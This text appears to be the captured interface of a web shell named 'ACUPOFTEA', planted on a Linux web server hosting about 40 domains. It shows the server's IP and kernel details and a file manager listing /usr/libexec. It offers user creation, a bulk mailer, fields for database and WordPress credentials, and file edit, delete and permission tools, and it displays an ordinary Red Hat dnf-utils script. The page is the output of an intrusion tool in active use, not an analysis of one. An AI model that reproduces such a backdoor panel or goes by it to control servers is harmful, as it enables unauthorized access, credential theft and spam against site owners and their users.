System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
libexec
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
dnf-utils
#!/usr/libexec/platform-python # The dnf-utils executable script. # # Copyright (C) 2017 Red Hat, Inc. # # This copyrighted material is made available to anyone wishing to use, # modify, copy, or redistribute it subject to the terms and conditions of # the GNU General Public License v.2, or (at your option) any later version. # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY expressed or implied, including the implied warranties of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General # Public License for more details. You should have received a copy of the # GNU General Public License along with this program; if not, write to the # Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA # 02110-1301, USA. Any Red Hat trademarks that are incorporated in the # source code or documentation are not subject to the GNU General Public # License and may only be used or replicated with the express permission of # Red Hat, Inc. # from __future__ import unicode_literals import sys import os.path MAPPING = {'debuginfo-install': ['debuginfo-install'], 'needs-restarting': ['needs-restarting'], 'find-repos-of-install': ['list', 'installed'], 'package-cleanup': [], 'repo-graph': ['repograph'], 'repoclosure': ['repoclosure'], 'repodiff': ['repodiff'], 'repomanage': ['repomanage'], 'repoquery': ['repoquery'], 'reposync': ['reposync'], 'repotrack': ['download', '--resolve', '--alldeps'], 'yum-builddep': ['builddep'], 'yum-config-manager': ['config-manager'], 'yum-debug-dump': ['debug-dump'], 'yum-debug-restore': ['debug-restore'], 'yum-groups-manager': ['groups-manager'], 'yumdownloader': ['download'] } def suppress_keyboard_interrupt_message(): """Prevent unsightly KeyboardInterrupt tracebacks. Nothing will be printed to the terminal after an uncaught :class:`exceptions.KeyboardInterrupt`. """ old_excepthook = sys.excepthook def new_hook(type, value, traceback): if type != KeyboardInterrupt: old_excepthook(type, value, traceback) else: pass sys.excepthook = new_hook # do this ASAP to prevent tracebacks after ^C during imports suppress_keyboard_interrupt_message() if __name__ != "__main__": sys.stderr.write('The executable DNF module must not be imported.') sys.exit(1) here = sys.path[0] if here != '/usr/bin': # git checkout import os dnf_toplevel = os.path.dirname(here) sys.path[0] = dnf_toplevel from dnf.cli import main command = os.path.basename(sys.argv[0]) args = sys.argv[1:] if command == 'package-cleanup': if '--dupes' in args: args[args.index('--dupes')] = '--duplicates' MAPPING[command] = ['repoquery'] elif '--leaves' in args: args[args.index('--leaves')] = '--unneeded' MAPPING[command] = ['repoquery'] elif '--orphans' in args: args[args.index('--orphans')] = '--extras' MAPPING[command] = ['repoquery'] elif '--problems' in args: args[args.index('--problems')] = '--unsatisfied' MAPPING[command] = ['repoquery'] elif '--cleandupes' in args: args[args.index('--cleandupes')] = '--duplicates' MAPPING[command] = ['remove'] else: sys.stderr.write('package-cleanup has to be executed with one of the options: --dupes, ' '--leaves, --orphans, --problems or --cleandupes\n') sys.exit(1) main.user_main(MAPPING[command] + args, exit_code=True)
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-09-24 10:57:27
..
DIR
-
drwxr-xr-x
2025-06-28 07:14:01
awk
DIR
-
drwxr-xr-x
2024-03-13 04:20:09
coreutils
DIR
-
drwxr-xr-x
2024-03-13 04:20:17
dbus-1
DIR
-
drwxr-xr-x
2025-08-28 10:58:30
dovecot
DIR
-
drwxr-xr-x
2025-04-15 10:57:58
gawk
LINK
-
drwxr-xr-x
2024-03-13 04:20:09
gcc
DIR
-
drwxr-xr-x
2025-08-26 09:44:17
getconf
DIR
-
drwxr-xr-x
2025-08-28 10:58:29
grubby
DIR
-
drwxr-xr-x
2024-06-24 12:46:49
hostname
DIR
-
drwxr-xr-x
2024-03-13 04:21:16
imunify-notifier
DIR
-
drwxr-xr-x
2024-11-18 10:57:19
initscripts
DIR
-
drwxr-xr-x
2024-03-13 04:20:39
installkernel
DIR
-
drwxr-xr-x
2024-06-24 12:46:49
kcare
DIR
-
drwxr-xr-x
2025-10-03 10:57:22
linux-boot-probes
DIR
-
drwxr-xr-x
2024-03-13 04:20:24
man-db
DIR
-
drwxr-xr-x
2024-03-13 04:21:15
mc
DIR
-
drwxr-xr-x
2024-06-24 01:43:03
microcode_ctl
DIR
-
drwxr-xr-x
2025-07-16 10:59:09
nfs-utils
DIR
-
drwxr-xr-x
2025-06-05 10:57:18
openldap
DIR
-
drwxr-xr-x
2025-03-11 09:44:39
openssh
DIR
-
drwxr-xr-x
2025-10-01 10:57:23
os-prober
DIR
-
drwxr-xr-x
2024-03-13 04:20:24
os-probes
DIR
-
drwxr-xr-x
2024-03-13 04:20:24
p11-kit
DIR
-
drwxr-xr-x
2024-06-24 12:44:38
plymouth
DIR
-
drwxr-xr-x
2022-04-18 04:45:15
selinux
DIR
-
drwxr-xr-x
2025-06-03 02:06:53
smartmontools
DIR
-
drwxr-xr-x
2024-06-24 12:46:52
sssd
DIR
-
drwxr-xr-x
2025-06-05 10:57:18
sudo
DIR
-
drwxr-xr-x
2025-08-28 10:58:34
tuned
DIR
-
drwxr-xr-x
2025-03-12 10:58:31
utempter
DIR
-
drwxr-xr-x
2024-03-13 04:20:19
audit-functions
990 B
-rwxr-x---
2025-07-15 09:41:56
chrony-helper
text/x-shellscript
7.17 KB
-rwxr-xr-x
2024-11-05 07:44:41
dirmngr_ldap
application/x-sharedlib
87.32 KB
-rwxr-xr-x
2022-09-13 10:15:05
dnf-utils
text/x-python
3.62 KB
-rwxr-xr-x
2024-04-08 10:02:46
ebtables
text/x-shellscript
1.33 KB
-rwxr-xr-x
2024-04-02 06:37:41
exim.daemon
text/x-shellscript
758 B
-rwxr-xr-x
2025-05-12 05:54:51
generate-rndc-key.sh
text/x-shellscript
546 B
-rwxr-xr-x
2025-02-20 09:05:37
gpg-check-pattern
application/x-sharedlib
111.88 KB
-rwxr-xr-x
2022-09-13 10:15:05
gpg-preset-passphrase
application/x-sharedlib
87.21 KB
-rwxr-xr-x
2022-09-13 10:15:05
gpg-protect-tool
application/x-sharedlib
206.3 KB
-rwxr-xr-x
2022-09-13 10:15:05
gpg-wks-client
application/x-sharedlib
227.22 KB
-rwxr-xr-x
2022-09-13 10:15:05
grepconf.sh
text/x-shellscript
253 B
-rwxr-xr-x
2018-08-12 07:47:56
import-state
text/x-shellscript
1.03 KB
-rwxr-xr-x
2022-08-10 01:03:37
imunify-message-gateway
application/x-executable
5.93 MB
-rwxr-xr-x
2025-08-22 10:14:24
loadmodules
text/x-shellscript
233 B
-rwxr-xr-x
2022-08-10 01:03:37
nfsrahead
application/x-sharedlib
37.12 KB
-rwxr-xr-x
2025-06-04 10:54:29
nm-daemon-helper
application/x-sharedlib
12.6 KB
-rwxr-xr-x
2025-08-26 09:47:31
nm-dhcp-helper
application/x-sharedlib
16.2 KB
-rwxr-xr-x
2025-08-26 09:47:31
nm-dispatcher
application/x-sharedlib
66.16 KB
-rwxr-xr-x
2025-08-26 09:47:31
nm-initrd-generator
application/x-sharedlib
740.48 KB
-rwxr-xr-x
2025-08-26 09:47:31
no-python
text/x-shellscript
157 B
-rwxr-xr-x
2025-08-26 09:08:20
platform-python
application/x-sharedlib
11.59 KB
-rwxr-xr-x
2025-08-26 09:08:24
platform-python-config
text/x-shellscript
204 B
-rwxr-xr-x
2025-08-26 09:08:08
platform-python3.6
application/x-sharedlib
11.59 KB
-rwxr-xr-x
2025-08-26 09:08:24
platform-python3.6-config
text/x-shellscript
204 B
-rwxr-xr-x
2025-08-26 09:08:08
platform-python3.6m
application/x-sharedlib
11.59 KB
-rwxr-xr-x
2025-08-26 09:08:24
platform-python3.6m-config
text/x-shellscript
204 B
-rwxr-xr-x
2025-08-26 09:08:08
platform-python3.6m-x86_64-config
text/x-shellscript
3.54 KB
-rwxr-xr-x
2025-08-26 09:01:50
postgresql-check-db-dir
text/x-shellscript
3.19 KB
-rwxr-xr-x
2024-02-27 08:24:43
report-command-error
application/x-executable
8.06 MB
-rwxr-xr-x
2025-08-22 10:14:24
run-with-intensity
application/x-executable
6.1 MB
-rwxr-xr-x
2025-08-22 10:14:24
scdaemon
application/x-sharedlib
442.36 KB
-rwxr-xr-x
2022-09-13 10:15:05
tcawmgr.cgi
application/x-sharedlib
25.1 KB
-rwxr-xr-x
2019-10-13 01:22:36
virt-what-cpuid-helper
application/x-sharedlib
7.91 KB
-rwxr-xr-x
2023-10-14 08:52:07
~ ACUPOFTEA - mail.ontime-ae.com